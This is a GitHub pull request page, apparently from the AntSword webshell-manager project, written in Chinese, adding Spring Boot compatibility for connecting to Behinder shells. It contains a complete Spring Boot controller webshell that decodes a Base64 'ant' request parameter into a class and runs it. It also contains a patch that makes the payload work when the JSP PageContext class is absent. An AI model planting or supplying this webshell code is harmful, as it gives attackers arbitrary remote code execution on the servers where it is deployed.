Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

兼容SpringBoot #1

Merged
merged 3 commits into from Oct 3, 2020
Merged

兼容SpringBoot #1

merged 3 commits into from Oct 3, 2020

Conversation

fupinglee
Copy link
Contributor

在SpringBoot环境下使用蚁剑连接冰蝎shell时,由于没有javax.servlet.jsp.PageContext,在连接时会报找不到该类。

import org.apache.shiro.codec.Base64;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

@Controller
@RequestMapping({"/bxcc"})
public class BxController extends ClassLoader{

    public BxController(){

    }
    public BxController(ClassLoader c){
        super(c);
    }

    public Class g(byte[] b) {
        return super.defineClass(b, 0, b.length);
    }

    @RequestMapping(value = "/index")
    public void index(HttpServletRequest request, HttpServletResponse response) {

        String bstr = request.getParameter("ant");

        try {
            if(bstr!=null){
                new BxController(this.getClass().getClassLoader()).g(Base64.decode(bstr)).newInstance().equals(response);
            }
        }catch (Exception e){

            e.printStackTrace();
        }
    }


}

ant01

在使用时利用Class.forName可以避免这种情况,修改的主要代码如下:

try{
            if(Class.forName("javax.servlet.jsp.PageContext").isInstance(obj)){
                Class clazz = Class.forName("javax.servlet.jsp.PageContext");
                request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj);
                response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj);
            }
        }catch (ClassNotFoundException | NoSuchMethodException pageContextErrorExection) {
            if (obj instanceof HttpServletRequest) {
                ...

            } else if (obj instanceof HttpServletResponse) {
                ...
            }
        }catch (Exception e) {
            e.printStackTrace();
        }

ant02

@yzddmr6
Copy link
Member

yzddmr6 commented Oct 3, 2020

逻辑有点问题:在有pageContext的情况下,当equals里面传入request或者response的时候,流程不会走到catch的代码块中。我今天改一下吧

@yzddmr6 yzddmr6 merged commit 8399919 into AntSwordProject:master Oct 3, 2020
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@yzddmr6 yzddmr6

Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
2 participants
@fupinglee @yzddmr6